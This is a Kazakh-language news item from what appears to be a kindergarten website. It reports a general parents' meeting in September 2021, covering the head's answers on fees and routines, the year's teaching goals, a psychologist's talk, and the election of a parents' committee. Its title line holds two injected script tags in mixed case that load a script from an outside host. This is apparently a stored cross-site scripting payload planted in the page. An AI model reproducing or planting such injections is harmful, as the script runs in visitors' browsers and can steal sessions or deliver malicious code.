Жалпы ата-аналар жиналысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.09.2021

«Жұлдыз» балабақшада «Оқу жылының басталуы- балабақшаның өміріндегі, ана-аналар мен оның тәрбиеленушілерінің жаңа кезеңнің басталуы» атты жалпы   ата-аналар жиналысы болып өтті. Жиналысқа барлық топтардың тәрбиешілері мен ата-аналар комитетінің мүшелері қатысты.

          Балабақша меңгерушісі О. А. Баранова ата-аналарды жиі мазалайтын сұрақтарға ( әр балаға жасалатын төлем, кезекші топ, күн тәртібі, тамақтану, балабақшаға ата-аналардың кіруі) жауап берді. Әдіскер П.Б.Нысанова жаңа оқу жылындағы мақсаттар мен міндеттер,  оқыту мен тәрбиелеу үрдісіне шолу жасады.

                   Педагог- психолог  Г. Х. Джунусова  -балалардың психологиялық денсаулығын сақтау және нығайту, олардың жағдайында үйлесімді дамуы, сонымен қатар әртүрлі өмірлік жағдайларда туындайтын психологиялық даму мәселелерін шешуде, балаларға, ата-аналар мен педагогтарға уақтылы көмек көрсету мақсатында «Махаббаттың бес тілі» тақырыбында кеңес берді.

                  Жиналыс соңында жаңа оқу жылына балабақшаның ата-аналар комитеті мүшелері сайланды.  

Просмотров: 344


Пікір қосу



Деректерді қолтаңбаға қосу